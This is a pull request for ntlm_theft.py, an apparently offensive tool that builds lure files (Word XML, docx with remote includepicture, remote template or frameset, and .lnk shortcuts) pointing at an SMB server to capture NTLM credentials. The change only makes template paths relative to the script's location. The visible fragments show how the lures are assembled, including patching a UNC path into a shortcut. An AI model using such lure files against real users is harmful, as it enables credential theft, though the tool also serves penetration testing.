### PR TITLE
fix: make it possible to run from anywhere

### DIFF
--- a/ntlm_theft.py
+++ b/ntlm_theft.py
@@ -29,6 +29,9 @@ import os
 import shutil
 import xlsxwriter
 
+#the basic path of the script, make it possible to run from anywhere
+script_directory = os.path.dirname(os.path.abspath(__file__))
+
 #arg parser to generate all or one file
 #python ntlm_theft --generate all --ip 127.0.0.1 --filename board-meeting2020
 parser = argparse.ArgumentParser(
@@ -128,7 +131,7 @@ def create_xml(generate,server,filename):
 # .xml with remote includepicture field attack
 # Filename: shareattack.xml, action=open, attacks=word
 def create_xml_includepicture(generate,server, filename):
-	documentfilename = os.path.join("templates", "includepicture-template.xml") 
+	documentfilename = os.path.join(script_directory,"templates", "includepicture-template.xml") 
 	# Read the template file
 	file = open(documentfilename, 'r', encoding="utf8")
 	filedata = file.read()
@@ -155,7 +158,7 @@ def create_htm(generate,server,filename):
 # .docx file with remote includepicture field attack
 def create_docx_includepicture(generate,server,filename):
 	# Source path  
-	src = os.path.join("templates", "docx-includepicture-template") 
+	src = os.path.join(script_directory,"templates", "docx-includepicture-template") 
 	# Destination path  
 	dest = os.path.join("docx-includepicture-template")
 	# Copy the content of  
@@ -182,7 +185,7 @@ def create_docx_includepicture(generate,server,filename):
 # Instructions: Word > Create New Document > Choose a Template > Unzip docx, change target in word\_rels\settings.xml.rels change target to smb server
 def create_docx_remote_template(generate,server,filename):
 	# Source path  
-	src = os.path.join("templates", "docx-remotetemplate-template") 
+	src = os.path.join(script_directory,"templates", "docx-remotetemplate-template") 
 	# Destination path  
 	dest = os.path.join("docx-remotetemplate-template")
 	# Copy the content of  
@@ -207,7 +210,7 @@ def create_docx_remote_template(generate,server,filename):
 # .docx file with Frameset attack
 def create_docx_frameset(generate,server,filename):
 	# Source path  
-	src = os.path.join("templates", "docx-frameset-template") 
+	src = os.path.join(script_directory,"templates", "docx-frameset-template") 
 	# Destination path  
 	dest = os.path.join("docx-frameset-template")
 	# Copy the content of  
@@ -419,7 +422,7 @@ def create_lnk(generate,server,filename):
 		print("Server name too long for lnk template, skipping.")
 		return
 	unc_path = unc_path.encode('utf-16le')
-	with open(os.path.join("templates", "shortcut-template.lnk"), 'rb') as lnk:
+	with open(os.path.join(script_directory,"templates", "shortcut-template.lnk"), 'rb') as lnk:
 		shortcut = list(lnk.read())
 	for i in range(0, len(unc_path)):
 		shortcut[offset + i] = unc_path[i]


### PR DESCRIPTION
When I created an alias for this Bash script, I encountered an issue where it attempted to locate the template folder based on the current working directory, regardless of where the script was run from. Since many users may add this script to their own toolset, I believe it's the right choice to determine the script's location within the script itself to find the absolute path of the template folder.
